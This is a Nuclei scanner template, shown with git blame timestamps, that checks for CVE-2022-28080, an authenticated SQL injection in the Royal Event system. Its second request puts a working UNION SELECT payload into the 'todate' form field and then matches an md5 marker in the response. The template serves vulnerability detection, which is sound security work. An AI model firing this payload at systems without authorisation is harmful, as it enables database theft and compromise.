nuclei-templates/http/cves/2022/CVE-2022-28080.yaml

82 lines
3.1 KiB
YAML
Raw Normal View History

2022-06-15 19:56:31 +00:00
id: CVE-2022-28080
info:
name: Royal Event - SQL Injection
2022-06-22 06:03:57 +00:00
author: lucasljm2001,ekrause,ritikchaddha
2022-06-15 19:56:31 +00:00
severity: high
2022-06-16 04:00:35 +00:00
description: |
Royal Event is vulnerable to a SQL injection vulnerability.
2023-09-27 15:51:13 +00:00
impact: |
Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the entire database.
2023-09-06 11:59:08 +00:00
remediation: |
To remediate this vulnerability, input validation and parameterized queries should be implemented to prevent SQL Injection attacks.
2022-06-15 19:56:31 +00:00
reference:
2022-06-22 06:03:57 +00:00
- https://www.exploit-db.com/exploits/50934
2022-06-15 19:56:31 +00:00
- https://www.sourcecodester.com/sites/default/files/download/oretnom23/Royal%20Event.zip
- https://github.com/erengozaydin/Royal-Event-Management-System-todate-SQL-Injection-Authenticated
- https://nvd.nist.gov/vuln/detail/CVE-2022-28080
2023-07-11 19:49:27 +00:00
- https://www.sourcecodester.com/php/15238/event-management-system-project-php-source-code.html
2022-06-15 19:56:31 +00:00
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.8
cve-id: CVE-2022-28080
2023-07-11 19:49:27 +00:00
cwe-id: CWE-89
epss-score: 0.01461
epss-percentile: 0.86424
2023-09-06 11:59:08 +00:00
cpe: cpe:2.3:a:event_management_system_project:event_management_system:1.0:*:*:*:*:*:*:*
metadata:
max-request: 2
2023-07-11 19:49:27 +00:00
vendor: event_management_system_project
product: event_management_system
2024-01-14 09:21:50 +00:00
tags: cve,cve2022,royalevent,edb,sqli,authenticated,cms,intrusive,event_management_system_project
2022-06-15 19:56:31 +00:00
http:
2022-06-22 06:03:57 +00:00
- raw:
2022-06-17 21:54:52 +00:00
- |
POST /royal_event/ HTTP/1.1
2022-06-22 06:03:57 +00:00
Host: {{Hostname}}
Content-Length: 353
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryCSxQll1eihcqgIgD
------WebKitFormBoundaryCSxQll1eihcqgIgD
Content-Disposition: form-data; name="username"
2022-06-17 21:54:52 +00:00
2022-06-22 06:03:57 +00:00
{{username}}
------WebKitFormBoundaryCSxQll1eihcqgIgD
Content-Disposition: form-data; name="password"
2022-06-17 21:54:52 +00:00
2022-06-22 06:03:57 +00:00
{{password}}
------WebKitFormBoundaryCSxQll1eihcqgIgD
Content-Disposition: form-data; name="login"
2022-06-17 21:54:52 +00:00
2022-06-22 06:03:57 +00:00
------WebKitFormBoundaryCSxQll1eihcqgIgD--
2022-06-16 04:01:27 +00:00
- |
2022-06-22 06:03:57 +00:00
POST /royal_event/btndates_report.php HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFboH5ITu7DsGIGrD
2022-06-16 04:01:27 +00:00
2022-06-22 06:03:57 +00:00
------WebKitFormBoundaryFboH5ITu7DsGIGrD
2022-06-15 19:56:31 +00:00
Content-Disposition: form-data; name="todate"
2022-06-22 06:03:57 +00:00
1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(md5("{{randstr}}"),0x1,0x2),NULL-- -
------WebKitFormBoundaryFboH5ITu7DsGIGrD
2022-06-15 19:56:31 +00:00
Content-Disposition: form-data; name="search"
3
2022-06-22 06:03:57 +00:00
------WebKitFormBoundaryFboH5ITu7DsGIGrD
2022-06-15 19:56:31 +00:00
Content-Disposition: form-data; name="fromdate"
01/01/2011
2022-06-22 06:03:57 +00:00
------WebKitFormBoundaryFboH5ITu7DsGIGrD--
2022-06-15 19:56:31 +00:00
2022-06-22 06:03:57 +00:00
matchers-condition: and
matchers:
- type: word
words:
- '{{md5("{{randstr}}")}}'
2022-06-15 19:56:31 +00:00
2022-06-22 06:03:57 +00:00
- type: status
status:
- 200
# digest: 490a0046304402206f49180b6302f9fef0412af1682487a99e8e841803be35372ea552f7878da30e022034287c08d99ef3e984b6ba91845fc4b18462d620c01f5ea9326718da215d237f:922c64590222798bb761d5b6d8e72950